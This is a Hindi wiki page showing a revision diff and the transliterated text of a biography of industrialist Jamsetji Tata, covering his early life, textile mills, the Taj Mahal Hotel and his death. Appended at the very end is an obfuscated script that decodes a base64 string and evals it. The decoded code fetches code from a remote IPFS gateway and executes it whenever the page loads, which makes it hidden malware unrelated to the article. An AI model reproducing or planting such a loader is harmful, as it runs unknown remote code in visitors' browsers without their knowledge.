Difference between revisions of "जमशेद जी टाटा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 43: Line 43:
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
 
जमशेदजी टाटा का जन्म सन 1839 में [[गुजरात]] के एक छोटे-से कस्बे नवसेरी में हुआ था। उनका परिवार [[पारसी]] पुजारियों का था। उनके [[पिता]] का नाम नुसीरवानजी तथा [[माता]] का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी व्यक्ति थे। जमशेदजी का भाग्य उन्हें मात्र चौदह वर्ष की अल्पायु में ही पिता के साथ [[बंबई]] (वर्तमान [[मुम्बई]]) ले आया। यहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी अपनी छोटी नाज़ुक उम्र में ही पिता का साथ देने लगे थे। सत्रह वर्ष की आयु में जमशेदजी ने 'एलफ़िंसटन कॉलेज', मुम्बई में प्रवेश ले लिया। इसी कॉलेज से वे दो वर्ष बाद 'ग्रीन स्कॉलर' के रूप में उत्तीर्ण हुए। तत्कालीन समय में यह उपाधि ग्रेजुएट के बराबर हुआ करती थी।<ref>{{cite web |url= http://ranchiexpress.com/145884|title=राष्ट्र निर्माण के प्रेणेताओं में अग्रणी थे- जमशेदजी टाटा|accessmonthday= 2 मार्च|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
जमशेदजी टाटा का जन्म सन 1839 में [[गुजरात]] के एक छोटे-से कस्बे नवसेरी में हुआ था। उनका परिवार [[पारसी]] पुजारियों का था। उनके [[पिता]] का नाम नुसीरवानजी तथा [[माता]] का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी व्यक्ति थे। जमशेदजी का भाग्य उन्हें मात्र चौदह वर्ष की अल्पायु में ही पिता के साथ [[बंबई]] (वर्तमान [[मुम्बई]]) ले आया। यहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी अपनी छोटी नाज़ुक उम्र में ही पिता का साथ देने लगे थे। सत्रह वर्ष की आयु में जमशेदजी ने 'एलफ़िंसटन कॉलेज', मुम्बई में प्रवेश ले लिया। इसी कॉलेज से वे दो वर्ष बाद 'ग्रीन स्कॉलर' के रूप में उत्तीर्ण हुए। तत्कालीन समय में यह उपाधि ग्रेजुएट के बराबर हुआ करती थी।<ref>{{cite web |url= http://ranchiexpress.com/145884|title=राष्ट्र निर्माण के प्रेणेताओं में अग्रणी थे- जमशेदजी टाटा|accessmonthday= 2 मार्च|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
==व्यवसाय की शुरुआत==
+
==व्यवसायिक जीवन की शुरुआत==
वह दौर बहुत कठिन था। [[अंग्रेज़]] अत्यंत बर्बरता से 1857 कि क्रान्ति को कुचलने में सफल हुए थे। 29 साल कि उम्र तक जमशेदजी अपने पिता जी के साथ ही काम करते रहे। 1868 में उन्होंने 21000 रुपयों के साथ अपना खुद का व्यवसाय शुरू किया। सबसे पहले उन्होंने एक दिवालिया तेल कारख़ाना ख़रीदा और उसे एक रुई के कारखाने में तब्दील कर दिया और उसका नाम बदल कर रखा-एलेक्जेंडर कर दिया। दो साल बाद उन्होंने इसे ख़ासे मुनाफे के साथ बेच दिया। इस पैसे के साथ उन्होंने [[नागपुर]] में 1874 में एक रुई का कारख़ाना लगाया। [[महारानी विक्टोरिया]] ने उन्ही दिनों [[भारत]] की रानी का खिताब हासिल किया था और जमशेदजी ने भी वक़्त को समझते हुए कारखाने का नाम इम्प्रेस्स मिल रखा। जमशेदजी एक अलग ही व्यक्तित्व के मालिक थे। उन्होंने ना केवल कपड़ा बनाने के नए नए तरीक़े ही अपनाए बल्कि अपने कारखाने में काम करने वाले श्रमिकों का भी खूब ध्यान रखा। उनके भले के लिए जमशेदजी ने अनेक नई व बेहतर श्रम-नीतियाँ अपनाई। इस नज़र से भी वे अपने समय से कहीँ आगे थे। सफलता को कभी केवल अपनी जागीर नहीं समझा, बल्कि उनके लिए उनकी सफलता उन सब की थी जो उनके लिए काम करते थे। जमशेद जी के अनेक राष्ट्रवादी और क्रांतिकारी नेताओं से नजदीकी संबंध थे, इन में प्रमुख थे, [[दादाभाई नौरोजी]] और [[फिरोजशाह मेहता]]। जमशेदजी पर और उनकी सोच पर इनका काफ़ी प्रभाव था। उनका मानना था कि आर्थिक स्वतंत्रता ही राजनीतिक स्वतंत्रता का आधार है। जमशेद जी के दिमाग में तीन बडे विचार थे -
+
सुदूर पूर्व और [[यूरोप]] में अपने शुरू-शुरू के व्यापारिक उद्यमों के बाद जमशेदजी टाटा ने वर्ष [[1868]] में 29 साल की उम्र में 21 हज़ार रुपये की पूंजी के साथ एक निजी फर्म प्रारंभ की। वे कई बार मैनचेस्टर जा चुके थे और इसी दौरान उनके मन में कपड़ा मिल शुरू करने का विचार आया। अपने कुछ दोस्तों की साझेदारी में उन्होंने एक पुरानी तेल मिल खरीदी और उसे कपड़ा मिल में बदल दिया और फिर दो साल बाद उसे मुनाफे पर बेच दिया। इसके बाद जमशेदजी ने अपनी मिल उस प्रदेश में लगाने की सोची, जहाँ [[कपास]] की पैदावार अधिक होती थी। इस कार्य के लिए उन्होंने [[नागपुर]] को चुना। वर्ष [[1874]] में उन्होंने अपने दोस्तों के समर्थन से पन्द्रह लाख रुपये की पूंजी से एक नई कंपनी शुरू की। कंपनी का नाम रखा 'सेंट्रल इंडिया स्पिनिंग, वीविंग एंड मैनुफैक्चरिंग कंपनी'। [[1 जनवरी]], [[1877]] को यह मिल ने कार्य करना प्रारम्भ किया। बाद के समय में इसका नाम बदलकर 'इम्प्रेस मिल' कर दिया गया।
# अपनी लोहा व स्टील कंपनी खोलना
+
====व्यक्तित्व====
#एक जगत प्रसिद्ध अध्ययन केंद्र स्थापित करना
+
जमशेदजी के रूप में [[भारत]] को एक ऐसा व्यक्ति मिल गया था, जिसके पास नई-नई कल्पनाएँ और विचार थे। जिन्हें वह वास्तविकता में बदल सकता था। अपने लक्ष्यों को हासिल करने में उन्होंने अपनी संपदा, अनुभव और प्रतिष्ठा का उपयोग किया। अपने साथियों का पूरा सहयोग अधिकार भाव से प्राप्त करने का उनमें एक असाधारण गुण था। उनकी दिनचर्या काफ़ी सवेरे शुरू हो जाती थी। कभी-कभी वे [[मुम्बई]] के समुद्री तट पर टहलने निकल जाते। टहलते-टहलते कभी वे अपने दोस्तों के यहाँ पहुँच जाते। कई बार तो उनके दोस्त सोते ही रहते। नाश्ते के समय वे अपने परिवार, रिश्तेदारों और मित्रों से चर्चा करते थे। मध्याह्व तक अपने दफ्तर पहुँचने से पहले वे अध्ययन और लेखन कार्य अवश्य करते। दफ्तर के बाद वे अपनी घोड़ागाड़ी में सैर के लिए निकल पड़ते, या एलफिंस्टन क्लब में ताश खेलते और बातचीत करते। वहाँ से लौटकर खाना खाते। अच्छा खाना अगर उनकी कमजोरी थी तो दूसरी ओर ज्ञान की उनमें जबरदस्त प्यास भी विद्यमान थी।
#एक जलविद्युत परियोजना (Hydro-electric plant) लगाना ।
+
==होटल ताज का निर्माण==
दुर्भाग्यवश उनके जीवन काल में तीनों में से कोई भी सपना पूरा ना हो सका। पर वे बीज तो बो ही चुके थे, एक ऐसा बीज जिसकी जड़ें उनकी आने वाली पीढ़ी ने अनेक देशों में फैलायीं।
+
{{main|होटल ताज मुम्बई}}
==निर्माण==
+
विश्व प्रसिद्ध 'ताजमहल होटल' सिर्फ़ मुम्बई ही नहीं बल्कि सम्पूर्ण [[भारत]] में ख्यातिप्राप्त है। 'ताजमहल होटल' के निर्माण के पीछे एक रोचक कहानी छुपी हुई है। [[सिनेमा]] के जनक लुमायर भाईयों ने अपनी खोज के छ: महीनों बाद अपनी पहली फ़िल्म का शो मुम्बई में प्रदर्शित किया था। वैसे तो वे ऑस्ट्रेलिया जा रहे थे, लेकिन बीच रास्ते में उन्होने मुम्बई में भी शो रखने की बात सोची। [[7 जुलाई]], [[1896]] को उन्होंने मुम्बई के तत्कालीन आलीशान वोटसन होटल में अपनी छ: अलग-अलग फ़िल्मों के शो आयोजित किए। इन शो को देखने के लिए मात्र ब्रिटिश लोगों को ही आमंत्रित किया गया था, क्योंकि वोटसन होटल के बाहर एक तख्ती लगी रहती थी, जिस पर लिखा होता था कि "भारतीय और कुत्ते होटल में नहीं आ सकते है"। 'टाटा समूह' के जमशेदजी टाटा भी लुमायर भाईयों की फ़िल्में देखना चाहते थे, लेकिन उन्हें वोटसन होटल में प्रवेश नहीं मिला। रंगभेद की इस घृणित नीति के ख़िलाफ़ उन्होनें आवाज भी उठाई। इस घटना के दो साल बाद ही वोटसन होटल की सारी शोभा धूमिल कर दे, एक ऐसे भव्य '[[होटल ताज मुम्बई|ताजमहल होटल]]' का निर्माण जमशेदजी ने शुरू करवा दिया। [[1903]] ई. में यह अति सुंदर होटल बनकर तैयार हो गया। कुछ समय तक इस होटल के दरवाजे पर एक तख्ती भी लटकती थी, जिस पर लिखा होता था कि- "ब्रिटिश और बिल्लियाँ अंदर नहीं आ सकतीं।<ref>{{cite web |url=http://www.tarakash.com/2/magazine/history/452-story-of-tajmahal-hotel-mumbai-history-facts.html |title=ताजमहल होटल के निर्माण की रोचक कथा|accessmonthday=2 मार्च|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
मुम्बई का प्रसिद्ध [[ताज महल होटल]] मुम्बई की शान माना जाता है जिसका निर्माण जमशेदजी टाटा ने [[दिसंबर]] 1903 में 4,21,00,000 रुपये के शाही खर्च के दौरान किया था। इसमे भी उन्होंने अपनी राष्ट्रवादी सोच को दिखाया था। उन दिनों स्थानीय भारतीयों को बेहतरीन यूरोपियन होटलों में घुसने नहीं दिया जाता था। ताजमहल होटल इस दमनकारी नीति का करारा जवाब था ।
 
 
==मृत्यु==
 
==मृत्यु==
 
जमशेद जी टाटा ने 19 मई 1904 में [[जर्मनी]] में उन्होंने अपनी आख़िरी सांस ली ।<ref>{{cite web |url=http://www.pressnote.in/profile---jamshed-ji-tata_92339.html |title=जमशेद जी टाटा |accessmonthday=[[4 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=प्रेसनोट |language=[[हिन्दी]] }}</ref>
 
जमशेद जी टाटा ने 19 मई 1904 में [[जर्मनी]] में उन्होंने अपनी आख़िरी सांस ली ।<ref>{{cite web |url=http://www.pressnote.in/profile---jamshed-ji-tata_92339.html |title=जमशेद जी टाटा |accessmonthday=[[4 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=प्रेसनोट |language=[[हिन्दी]] }}</ref>

Revision as of 08:16, 2 March 2013

jamashed ji tata
poora nam jamashedaji nusiravanaji tata
janm 3 march, 1839
janm bhoomi navaseri kasba, gujarat
mrityu 19 mee, 1904
mrityu sthan jarmani
pati/patni hira baee daboo
karm bhoomi mumbee
karm-kshetr udyogapati
prasiddhi mumbee ki shan taj mahal hotal ka nirman kiya.
nagarikata bharatiy
any janakari jamashedaji tata vartaman mean bharat ke vishvaprasiddh audyogik gharane tata samooh ke sansthapak the.
adyatan‎

jamashedaji nusiravanaji tata (janm- 3 march, 1839, gujarat; mrityu- 19 mee, 1904, jarmani) bharat ke vishvaprasiddh audyogik gharane "tata samooh" ke sansthapak the. bharatiy audyogik kshetr mean jamashedaji ne jo yogadan diya, vah asadharan aur bahut hi mahattvapoorn mana jata hai. unhoanne bharatiy audyogik vikas ka marg aise samay mean prashast kiya tha, jab us disha mean keval yooropiy, vishesh roop se aangrez hi kushal samajhe jate the. ianglaind ki apani pratham yatra se lautakar jamashedaji tata ne chianchapokali ke ek tel mil ko kataee-bunaee mil mean parivartit karake audyogik jivan ka sootrapat kiya tha. tata samrajy ke janak jamashedaji ke kary aj bhi logoan ko prerit evan vismit karate haian. bhavishy ko bhaanpane ki adbhut kshamata ke bal par hi unhoanne ek svanirbhar audyogik bharat ka sapana dekha tha. unhoanne vaijnanik evan takaniki shiksha ke lie behatarin suvidhaean upalabdh karayian aur rashtr ko mahashakti banane ka marg dikhaya.

janm tatha shiksha

jamashedaji tata ka janm san 1839 mean gujarat ke ek chhote-se kasbe navaseri mean hua tha. unaka parivar parasi pujariyoan ka tha. unake pita ka nam nusiravanaji tatha mata ka nam jivanabaee tata tha. parasi padariyoan ke apane khanadan mean nusiravanaji pahale vyavasayi vyakti the. jamashedaji ka bhagy unhean matr chaudah varsh ki alpayu mean hi pita ke sath banbee (vartaman mumbee) le aya. yahaan unhoanne vyavasay (dhandhe) mean qadam rakha. jamashedaji apani chhoti nazuk umr mean hi pita ka sath dene lage the. satrah varsh ki ayu mean jamashedaji ne 'elafiansatan k aaulej', mumbee mean pravesh le liya. isi k aaulej se ve do varsh bad 'grin sk aaular' ke roop mean uttirn hue. tatkalin samay mean yah upadhi grejuet ke barabar hua karati thi.[1]

vyavasayik jivan ki shuruat

sudoor poorv aur yoorop mean apane shuroo-shuroo ke vyaparik udyamoan ke bad jamashedaji tata ne varsh 1868 mean 29 sal ki umr mean 21 hazar rupaye ki pooanji ke sath ek niji pharm praranbh ki. ve kee bar mainachestar ja chuke the aur isi dauran unake man mean kap da mil shuroo karane ka vichar aya. apane kuchh dostoan ki sajhedari mean unhoanne ek purani tel mil kharidi aur use kap da mil mean badal diya aur phir do sal bad use munaphe par bech diya. isake bad jamashedaji ne apani mil us pradesh mean lagane ki sochi, jahaan kapas ki paidavar adhik hoti thi. is kary ke lie unhoanne nagapur ko chuna. varsh 1874 mean unhoanne apane dostoan ke samarthan se pandrah lakh rupaye ki pooanji se ek nee kanpani shuroo ki. kanpani ka nam rakha 'seantral iandiya spiniang, viviang eand mainuphaikchariang kanpani'. 1 janavari, 1877 ko yah mil ne kary karana prarambh kiya. bad ke samay mean isaka nam badalakar 'impres mil' kar diya gaya.

vyaktitv

jamashedaji ke roop mean bharat ko ek aisa vyakti mil gaya tha, jisake pas nee-nee kalpanaean aur vichar the. jinhean vah vastavikata mean badal sakata tha. apane lakshyoan ko hasil karane mean unhoanne apani sanpada, anubhav aur pratishtha ka upayog kiya. apane sathiyoan ka poora sahayog adhikar bhav se prapt karane ka unamean ek asadharan gun tha. unaki dinacharya kafi savere shuroo ho jati thi. kabhi-kabhi ve mumbee ke samudri tat par tahalane nikal jate. tahalate-tahalate kabhi ve apane dostoan ke yahaan pahuanch jate. kee bar to unake dost sote hi rahate. nashte ke samay ve apane parivar, rishtedaroan aur mitroan se charcha karate the. madhyahv tak apane daphtar pahuanchane se pahale ve adhyayan aur lekhan kary avashy karate. daphtar ke bad ve apani gho daga di mean sair ke lie nikal p date, ya elaphianstan klab mean tash khelate aur batachit karate. vahaan se lautakar khana khate. achchha khana agar unaki kamajori thi to doosari or jnan ki unamean jabaradast pyas bhi vidyaman thi.

hotal taj ka nirman

  1. REDIRECTsaancha:mukhy

vishv prasiddh 'tajamahal hotal' sirf mumbee hi nahian balki sampoorn bharat mean khyatiprapt hai. 'tajamahal hotal' ke nirman ke pichhe ek rochak kahani chhupi huee hai. sinema ke janak lumayar bhaeeyoan ne apani khoj ke chh: mahinoan bad apani pahali film ka sho mumbee mean pradarshit kiya tha. vaise to ve aaustreliya ja rahe the, lekin bich raste mean unhone mumbee mean bhi sho rakhane ki bat sochi. 7 julaee, 1896 ko unhoanne mumbee ke tatkalin alishan votasan hotal mean apani chh: alag-alag filmoan ke sho ayojit kie. in sho ko dekhane ke lie matr british logoan ko hi amantrit kiya gaya tha, kyoanki votasan hotal ke bahar ek takhti lagi rahati thi, jis par likha hota tha ki "bharatiy aur kutte hotal mean nahian a sakate hai". 'tata samooh' ke jamashedaji tata bhi lumayar bhaeeyoan ki filmean dekhana chahate the, lekin unhean votasan hotal mean pravesh nahian mila. rangabhed ki is ghrinit niti ke khilaf unhonean avaj bhi uthaee. is ghatana ke do sal bad hi votasan hotal ki sari shobha dhoomil kar de, ek aise bhavy 'tajamahal hotal' ka nirman jamashedaji ne shuroo karava diya. 1903 ee. mean yah ati suandar hotal banakar taiyar ho gaya. kuchh samay tak is hotal ke daravaje par ek takhti bhi latakati thi, jis par likha hota tha ki- "british aur billiyaan aandar nahian a sakatian.[2]

mrityu

jamashed ji tata ne 19 mee 1904 mean jarmani mean unhoanne apani akhiri saans li .[3]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rashtr nirman ke prenetaoan mean agrani the- jamashedaji tata (hindi). . abhigaman tithi: 2 march, 2013.
  2. tajamahal hotal ke nirman ki rochak katha (hindi). . abhigaman tithi: 2 march, 2013.
  3. jamashed ji tata (hindi) presanot. abhigaman tithi: 4 aprॅl, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>